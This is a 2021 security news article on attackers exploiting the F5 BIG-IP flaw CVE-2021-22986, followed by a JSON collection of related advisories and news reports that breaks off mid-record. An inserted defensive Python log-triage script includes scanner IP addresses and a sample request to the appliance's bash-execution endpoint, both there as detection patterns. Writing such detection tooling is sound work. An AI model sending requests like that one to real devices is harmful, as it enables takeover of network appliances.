Attackers are exploiting a recently patched, critical vulnerability in F5 devices that have not yet been updated.
The unauthenticated remote command execution flaw (CVE-2021-22986) exists in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure, and could allow attackers to take full control over a vulnerable system.
Earlier in March, F5 [issued a patch for the flaw](<https://threatpost.com/f5-cisa-critical-rce-bugs/164679/>), which has a CVSS rating of 9.8 and lies in the iControl REST interface. Soon after the patch shipped, several researchers posted proof-of-concept (PoC) exploit code derived by reverse engineering the patched Java code in BIG-IP.
Fast forward to this week, researchers reported mass scanning for – and in-the-wild exploitation of – the flaw.
“Starting this week and especially in the last 24 hours (March 18th, 2021) we have observed multiple exploitation attempts against our honeypot infrastructure,” said researchers with the NCC Group [on Thursday](<https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/>). “This knowledge, combined with having reproduced the full exploit-chain, we assess that a public exploit is likely to be available in the public domain soon.”
## CISA, Researchers Urge Updating
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has [urged](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/f5-security-advisory-rce-vulnerabilities-big-ip-big-iq>) companies using BIG-IP and BIG-IQ to fix the critical F5 flaw, along with a second bug tracked as [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>). That flaw, rated CVSS 9.9, affects the Traffic Management User Interface (TMUI), also referred to as the Configuration utility: when a device runs in Appliance mode, undisclosed TMUI pages contain an authenticated remote command execution vulnerability. Unlike CVE-2021-22986, exploiting it requires valid credentials.
> Opportunistic mass scanning activity detected from the following hosts checking for F5 iControl REST endpoints vulnerable to remote command execution (CVE-2021-22986).
>
> 112.97.56.78 (🇨🇳)
> 13.70.46.69 (🇭🇰)
> 115.236.5.58 (🇨🇳)
>
> Vendor advisory: <https://t.co/MsZmXEtcTn> [#threatintel](<https://twitter.com/hashtag/threatintel?src=hash&ref_src=twsrc%5Etfw>)
>
> — Bad Packets (@bad_packets) [March 19, 2021](<https://twitter.com/bad_packets/status/1372818419611885576?ref_src=twsrc%5Etfw>)
The scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies, including some of the world’s biggest financial institutions and ISPs.
“The F5 BIG-IP is a very juicy target due to the fact that it can handle highly sensitive data,” said Craig Young, principal security researcher at Tripwire in an email. “An attacker with full control over a load balancing appliance can also take control over the web applications served through it.”
It’s not clear who is behind the exploitations; Threatpost has reached out to NCC Group for further comment.
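Nothing in the article shows how a defender would act on the scanning reports above, so here is an added example (mine, not code from Threatpost, NCC Group or Bad Packets): a Python triage pass over access logs from the BIG-IP management interface. It assumes Apache-style access-log lines from the httpd serving the management plane, that the iControl REST API is reached under the `/mgmt/` path prefix, and that the operator can name the networks from which administration is expected. The log lines are constructed for the example; the scanner addresses are the three Bad Packets published.

```python
"""Triage BIG-IP management-plane access logs for iControl REST probing.

Added example (not from the Threatpost article, NCC Group or Bad Packets).
Assumptions: Apache/combined-style access-log lines from the httpd in front of
the BIG-IP management interface; iControl REST lives under the /mgmt/ prefix;
the operator supplies the networks from which administration is expected.
"""
import ipaddress
import re
from collections import Counter

# The three scanner sources reported by Bad Packets on 19 March 2021.
KNOWN_SCANNERS = {"112.97.56.78", "13.70.46.69", "115.236.5.58"}

ICONTROL_PREFIX = "/mgmt/"  # iControl REST API path prefix

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample log (not real traffic). The paths are ordinary iControl
# REST endpoints; the point is who reached them and whether they succeeded.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Mar/2021:10:01:12 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 1024
112.97.56.78 - - [18/Mar/2021:10:02:40 +0000] "POST /mgmt/shared/authn/login HTTP/1.1" 401 102
13.70.46.69 - - [18/Mar/2021:10:03:01 +0000] "GET /mgmt/tm/sys/version HTTP/1.1" 401 102
10.0.0.5 - - [18/Mar/2021:10:04:17 +0000] "GET /mgmt/tm/ltm/pool HTTP/1.1" 200 5120
198.51.100.23 - - [18/Mar/2021:10:05:33 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 318
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def triage(log_text, trusted_nets=()):
    """Flag iControl REST requests from anywhere outside the trusted admin networks.

    Severity: 'high' for a known scanner, or for an untrusted source that got a
    success response (status < 400); 'medium' for an untrusted probe that was
    rejected. Requests outside /mgmt/ and requests from trusted networks are ignored.
    """
    trusted = [ipaddress.ip_network(n) for n in trusted_nets]
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(ICONTROL_PREFIX):
            continue
        try:
            src = ipaddress.ip_address(rec["src"])
        except ValueError:
            continue  # hostname-logged sources are out of scope here
        if any(src in net for net in trusted):
            continue
        if rec["src"] in KNOWN_SCANNERS:
            severity, reason = "high", "known scanner"
        elif rec["status"] < 400:
            severity, reason = "high", "untrusted source received a success response"
        else:
            severity, reason = "medium", "untrusted probe rejected"
        findings.append({
            "src": rec["src"], "ts": rec["ts"], "method": rec["method"],
            "path": rec["path"], "status": rec["status"],
            "severity": severity, "reason": reason,
        })
    return findings


def summarize(findings):
    """Count findings per source address, for a quick block list or ticket."""
    return Counter(f["src"] for f in findings)


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG, trusted_nets=["10.0.0.0/8"]):
        print(f"{f['severity']:<6} {f['src']:<15} {f['method']} {f['path']} -> {f['status']} ({f['reason']})")
```

Point it at a real log export by replacing SAMPLE_LOG and listing the admin networks in `trusted_nets`. Any finding on an appliance whose management interface was supposed to be private is evidence of exposure before it is evidence of exploitation; a success response to an untrusted source is the line to escalate first.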
## Other Active Exploits of F5 Flaws
Security experts [in July 2020 urged companies](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to deploy an urgent patch for a critical vulnerability in F5 Networks’ networking devices that was being actively exploited by attackers to scrape credentials, launch malware and more. That remote code-execution flaw ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), also in TMUI, had a CVSS score of 10 out of 10.
And in September 2020, the U.S. government warned that Chinese threat actors had compromised several government and private-sector entities by [exploiting vulnerabilities in F5 BIG-IP devices](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>), as well as Citrix and Pulse Secure VPNs and Microsoft Exchange servers.
For this latest rash of exploit attempts, anyone running an affected version of BIG-IP should prioritize upgrade, said Young.
“Any organization running BIG-IP or other network appliance with the management access exposed to the Internet should be re-evaluating their network layout and bringing those assets onto private networks,” he said.
Published 2021-03-19 by Lindsey O'Donnell, Threatpost: <https://threatpost.com/critical-f5-big-ip-flaw-now-under-active-attack/164940/>. CVEs referenced: CVE-2020-5902, CVE-2021-22986, CVE-2021-22987.
{"cisa": [{"lastseen": "2021-08-02T18:07:56", "description": "F5 has released a [security advisory](<https://support.f5.com/csp/article/K02566623>) to address remote code execution (RCE) vulnerabilities\u2014[CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>), [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>)\u2014impacting BIG-IP and BIG-IQ devices. An attacker could exploit these vulnerabilities to take control of an affected system.\n\nCISA encourages users and administrators review the [F5 advisory](<https://support.f5.com/csp/article/K02566623>) and install updated software as soon as possible.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/f5-security-advisory-rce-vulnerabilities-big-ip-big-iq>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-03-10T00:00:00", "type": "cisa", "title": "F5 Security Advisory for RCE Vulnerabilities in BIG-IP, BIG-IQ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987"], "modified": "2021-03-10T00:00:00", "id": "CISA:A55091A825D08BAA55750010D4193771", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/f5-security-advisory-rce-vulnerabilities-big-ip-big-iq", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:46", "description": "F5 has released a security advisory to address a remote code execution (RCE) vulnerability\u2014[CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)\u2014in the BIG-IP Traffic Management User Interface (TMUI). An attacker could exploit this vulnerability to take control of an affected system.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the F5 advisory for [CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) and upgrade to the appropriate version.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-04T00:00:00", "type": "cisa", "title": "F5 Releases Security 
Advisory for BIG-IP TMUI RCE vulnerability, CVE-2020-5902", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-04T00:00:00", "id": "CISA:3219D2E89DB1680D9EF6F22691FC5829", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:25", "description": "[](<https://thehackernews.com/images/-fDHng6o_Mgc/YFYaPcYnvAI/AAAAAAAACEo/0OqPmutMPS0yEPCAkfPEvGz8Z0E8VNZ2QCLcBGAsYHQ/s0/f5.jpg>)\n\nAlmost 10 days after application security company F5 Networks [released patches](<https://thehackernews.com/2021/03/critical-pre-auth-rce-flaw-found-in-f5.html>) for critical vulnerabilities in its BIG-IP and BIG-IQ products, adversaries have begun opportunistically mass scanning and targeting exposed and unpatched networking devices to break into enterprise networks.\n\nNews of in the wild exploitation comes on the heels of a proof-of-concept exploit code that surfaced online earlier this week by reverse-engineering the Java software patch in BIG-IP. The [mass scans](<https://twitter.com/bad_packets/status/1372650076024107009>) are said to have spiked since March 18.\n\nThe flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical remote code execution (CVE-2021-22986) also impacting BIG-IQ versions 6.x and 7.x. 
[CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>) (CVSS score: 9.8) is notable for the fact that it's an unauthenticated, remote command execution vulnerability affecting the iControl REST interface, allowing an attacker to execute arbitrary system commands, create or delete files, and disable services without the need for any authentication.\n\nSuccessful exploitation of these vulnerabilities could lead to a full compromise of susceptible systems, including the possibility of remote code execution as well as trigger a buffer overflow, leading to a denial of service (DoS) attack.\n\n[](<https://thehackernews.com/images/-pOsO0M730cQ/YFYcww7f-PI/AAAAAAAA3s0/S9EnJJEwsiUZnY7kt2AC-WtKguHTDCbXwCLcBGAsYHQ/s0/hacking-code.jpg>)\n\nWhile F5 said it wasn't aware of any public exploitation of these issues on March 10, researchers from NCC Group [said](<https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/>) they have now found evidence of \"full chain exploitation of F5 BIG-IP/BIG-IQ iControl REST API vulnerabilities CVE-2021-22986\" in the wake of multiple exploitation attempts against its honeypot infrastructure.\n\nAdditionally, Palo Alto Networks' Unit 42 threat intelligence team [said](<https://twitter.com/Unit42_Intel/status/1373017186818781190>) it found attempts to exploit CVE-2021-22986 to install a variant of the Mirai botnet. But it's not immediately clear if those attacks were successful.\n\nGiven the popularity of BIG-IP/BIG-IQ in corporate and government networks, it should come as no surprise that this is the second time in a year F5 appliances have become a lucrative target for exploitation. \n\nLast July, the company addressed a similar critical flaw ([CVE-2020-5902](<https://thehackernews.com/2020/07/f5-big-ip-application-security.html>)), following which it was abused by Iranian and Chinese state-sponsored hacking groups, prompting the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert cautioning of a \"broad scanning activity for the presence of this vulnerability across federal departments and agencies.\"\n\n\"The bottom line is that [the flaws] affect all BIG-IP and BIG-IQ customers and instances \u2014 we urge all customers to update their BIG-IP and BIG-IQ deployments to the fixed versions as soon as possible,\" F5 Senior Vice President Kara Sprague [noted](<https://www.f5.com/company/blog/big-ip-and-big-iq-vulnerabilities-protecting-your-organization>) last week.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-20T15:54:00", "type": "thn", "title": "Critical F5 BIG-IP Bug Under Active Attacks After PoC Exploit Posted Online", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2021-22986"], "modified": 
"2021-03-22T14:27:48", "id": "THN:4959B86491B72239BCAF1958D167D57D", "href": "https://thehackernews.com/2021/03/latest-f5-big-ip-bug-under-active.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-6eC4FwSH2yw/YEmwuyqxcNI/AAAAAAAACAY/aWrRRdD8cBg6xoe5Pf5tW9tF8Rh1YaijwCLcBGAsYHQ/s0/f5-big-ip-hacking.jpg>)\n\nApplication security company F5 Networks on Wednesday published an [advisory](<https://support.f5.com/csp/article/K02566623>) warning of four critical vulnerabilities impacting multiple products that could result in a denial of service (DoS) attack and even unauthenticated remote code execution on target networks.\n\nThe patches concern a total of seven related flaws (from CVE-2021-22986 through CVE-2021-22992), [two](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2126>) of [which](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2132>) were discovered and reported by Felix Wilhelm of Google Project Zero in December 2020.\n\nThe four critical flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical pre-auth remote code execution (CVE-2021-22986) also affecting BIG-IQ versions 6.x and 7.x. 
F5 said it's not aware of any public exploitation of these issues.\n\nSuccessful exploitation of these vulnerabilities could lead to a full compromise of vulnerable systems, including the possibility of remote code execution as well as triggering a buffer overflow, leading to a DoS attack.\n\nUrging customers to update their BIG-IP and BIG-IQ deployments to a fixed version as soon as possible, F5 Networks' Kara Sprague [said](<https://www.f5.com/company/blog/big-ip-and-big-iq-vulnerabilities-protecting-your-organization>) the \"vulnerabilities were discovered as a result of regular and continuous internal security testing of our solutions and in partnership with respected third parties working through F5's security program.\"\n\nThe vulnerabilities have been addressed in the following versions:\n\n * BIG-IP versions: 16.0.1.1, 15.1.2.1, 14.1.4, 13.1.3.6, 12.1.5.3, and 11.6.5.3\n * BIG-IQ versions: 8.0.0, 7.1.0.3, and 7.0.0.2\n\nBesides these flaws, Wednesday's patches also include fixes for 14 other unrelated security issues.\n\nThe fixes are notable for the fact that it's the second time in as many years that F5 has revealed flaws that could allow remote code execution. \n\nThe latest update to BIG-IP software arrives less than a year after the company addressed a [similar critical flaw](<https://support.f5.com/csp/article/K52145254>) ([CVE-2020-5902](<https://thehackernews.com/2020/07/f5-big-ip-application-security.html>)) in early July 2020, with multiple hacking groups exploiting the bug to target unpatched devices, prompting the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) to issue an [alert](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) cautioning of a \"broad scanning activity for the presence of this vulnerability across federal departments and agencies.\"\n\n\"This bug is probably going to fly under the radar, but this is a much bigger deal than it looks because it says something is really really broken in the internal security process of F5 BIG-IP devices,\" [said](<https://twitter.com/pwnallthethings/status/1369682528982999048>) Matt \"Pwn all the Things\" Tait in a tweet.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-11T05:56:00", "type": "thn", "title": "Critical Pre-Auth RCE Flaw Found in F5 Big-IP Platform \u2014 Patch ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2021-22986", 
"CVE-2021-22992"], "modified": "2021-03-11T06:01:14", "id": "THN:D31DB501A57ADE0C1DBD12724D8CA44C", "href": "https://thehackernews.com/2021/03/critical-pre-auth-rce-flaw-found-in-f5.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:58", "description": "[](<https://thehackernews.com/images/-Dtzc9yz6RbM/YMMKHm4Kx-I/AAAAAAAAC1I/WYDMtfEjbWsxxIw0vYe_MVWM-NM6RyBbwCLcBGAsYHQ/s0/ukraine-russia-hacking.png>)\n\nCybersecurity researchers on Thursday took the wraps off a new cyber espionage group that has been behind a series of targeted attacks against diplomatic entities and telecommunication companies in Africa and the Middle East since at least 2017.\n\nDubbed \"[BackdoorDiplomacy](<https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/>),\" the campaign involves targeting weak points in internet-exposed devices such as web servers to perform a panoply of cyber hacking activities, including laterally moving across the network to deploy a custom implant called Turian that's capable of exfiltrating sensitive data stored in removable media.\n\n\"BackdoorDiplomacy shares tactics, techniques, and procedures with other Asia-based groups. 
Turian likely represents a next stage evolution of [Quarian](<https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal>), the backdoor last observed in use in 2013 against diplomatic targets in Syria and the U.S,\" said Jean-Ian Boutin, head of threat research at Slovak cybersecurity firm ESET.\n\n[](<https://thehackernews.com/images/-GIau-4HiGNY/YML9xAgaoII/AAAAAAAAC04/eXu31e-sG6c5n_ctCdy5Ywqze7jQrNwPQCLcBGAsYHQ/s0/malware-code.jpg>)\n\nEngineered to target both Windows and Linux operating systems, the cross-platform group singles out management interfaces for networking equipment and servers with internet-exposed ports, likely exploiting unpatched vulnerabilities to deploy the China Chopper web shell for initial access, using it to conduct reconnaissance and install the backdoor.\n\n[](<https://thehackernews.com/images/-1FpXL2Tz5Cw/YML-Kbavm8I/AAAAAAAAC1A/FhSXMvLarUswpSjlt04uYWaNTB0uFRHbgCLcBGAsYHQ/s0/malware-encryption.jpg>)\n\nTargeted systems include F5 BIG-IP devices (CVE-2020-5902), Microsoft Exchange servers, and Plesk web hosting control panels. Victims have been identified in the Ministries of Foreign Affairs of multiple African countries, as well as in Europe, the Middle East, and Asia. Additionally, telecom providers in Africa and at least one Middle Eastern charity have also been hit.\n\n\"In each case, operators employed similar tactics, techniques, and procedures (TTPs), but modified the tools used, even within close geographic regions, likely to make tracking the group more difficult,\" the researchers said. 
BackdoorDiplomacy is also believed to overlap with previously reported campaigns operated by a Chinese-speaking group Kaspersky tracks as \"[CloudComputating](<https://securelist.com/apt-trends-report-q2-2020/97937/>).\"\n\nBesides its features to gather system information, take screenshots, and carry out file operations, ESET researchers said Turian's network encryption protocol is nearly identical to that employed by [WhiteBird](<https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird>), a C++ backdoor operated by an Asia-based threat actor named Calypso, that was installed within diplomatic organizations in Kazakhstan and Kyrgyzstan, and during the same timeframe as BackdoorDiplomacy.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-11T07:01:00", "type": "thn", "title": "New Cyber Espionage Group Targeting Ministries of Foreign Affairs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-06-14T06:04:35", "id": "THN:BCC351AC0BA61400C97A7E529C22A518", "href": "https://thehackernews.com/2021/06/new-cyber-espionage-group-targeting.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-22T03:59:04", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiksM7slN_dJ5WFWyeZAhQxY-5ycGRUBwDOewiWPSI1Fe7vaIJErbZi5xc9ZFpBT3M5PfKMZQjfqkphQFD19YK7LLjTk8vuvPrF3AFRDRPELT7sD0tgujtXb-Ws8fkbtwYjvT0Ga_KfpkH0BR3QueoSWrGrLhxqIsGXMY5LA5Ao_X8BGnQ2qjudnjZm/s728-e100/software-developmnet.jpg>)\n\nA large software development company whose software is used by different state entities in Ukraine was at the receiving end of an \"uncommon\" piece of malware, new research has found.\n\nThe malware, first observed on the morning of May 19, 2022, is a custom variant of the open source backdoor known as [GoMet](<https://github.com/Laeeth/GoMet>) and is designed for maintaining persistent access to the network.\n\n\"This access could be leveraged in a variety of ways including deeper access or to launch additional attacks, including the potential for software supply chain compromise,\" Cisco Talos [said](<https://blog.talosintelligence.com/2022/07/attackers-target-ukraine-using-gomet.html>) in a report shared with The Hacker News.\n\nAlthough there are no concrete indicators linking the attack to a single actor or group, the cybersecurity firm's assessment points to Russian nation-state activity.\n\nPublic reporting into the use of GoMet in real-world attacks has so far uncovered only two documented cases to date: one in 2020, coinciding with the disclosure of [CVE-2020-5902](<https://thehackernews.com/2020/07/f5-big-ip-application-security.html>), a critical remote code execution flaw in F5's BIG-IP networking devices.\n\nThe second instance entailed the successful exploitation of 
[CVE-2022-1040](<https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html>), a remote code execution vulnerability in Sophos Firewall, by an unnamed advanced persistent threat (APT) group earlier this year.\n\n\"We haven't seen GoMet deployed across the other organizations we've been working closely with and monitoring so that implies it is targeted in some manner but could be in use against additional targets we don't have visibility into,\" Nick Biasini, head of outreach for Cisco Talos, told The Hacker News.\n\n\"We have also conducted relatively rigorous historic analysis and see very little use of GoMet historically which further indicates that it is being used in very targeted ways.\"\n\nGoMet, as the name implies, is written in Go and comes with features that allow the attacker to remotely commandeer the compromised system, including uploading and downloading files, running arbitrary commands, and using the initial foothold to propagate to other networks and systems via what's called a [daisy chain](<https://www.tenable.com/blog/daisy-chaining-how-vulnerabilities-can-be-greater-than-the-sum-of-their-parts>).\n\nAnother notable feature of the implant is its ability to run scheduled jobs using [cron](<https://en.wikipedia.org/wiki/Cron>). While the original code is configured to execute cron jobs once every hour, the modified version of the backdoor used in the attack is built to run every two seconds and ascertain if the malware is connected to a command-and-control server.\n\n\"The majority of the attacks we've been seeing lately are related to access, either directly or through credential acquisition,\" Biasini said. \"This is another example of that with GoMet being deployed as a backdoor.\"\n\n\"Once the access has been established, additional reconnaissance and more thorough operations can follow. 
We're working to kill the attacks before they get to this stage so it's difficult to predict the types of follow-on attacks.\"\n\nThe findings come as the U.S. Cyber Command on Wednesday [shared](<https://twitter.com/CNMF_CyberAlert/status/1549764857972621322>) the indicators of compromise (IoCs) pertaining to different types of malware such as [GrimPlant, GraphSteel](<https://thehackernews.com/2022/04/ukraine-warns-of-cyber-attack-aiming-to.html>), Cobalt Strike Beacon, and [MicroBackdoor](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>) targeting Ukrainian networks in recent months.\n\nCybersecurity firm Mandiant has since [attributed](<https://www.mandiant.com/resources/spear-phish-ukrainian-entities>) the phishing attacks to two espionage actors tracked as [UNC1151](<https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html>) (aka Ghostwriter) and UNC2589, the latter of which is suspected to \"act in support of Russian government interest and has been conducting extensive espionage collection in Ukraine.\"\n\nThe uncategorized threat cluster UNC2589 is also believed to be behind the [WhisperGate](<https://thehackernews.com/2022/01/a-new-destructive-malware-targeting.html>) (aka PAYWIPE) data wiper attacks in mid-January 2022. Microsoft, which is tracking the same group under the name [DEV-0586](<https://thehackernews.com/2022/04/microsoft-documents-over-200.html>), has assessed it to be affiliated to Russia's [GRU military intelligence](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>).\n\n \n\n\nFound this article interesting? 
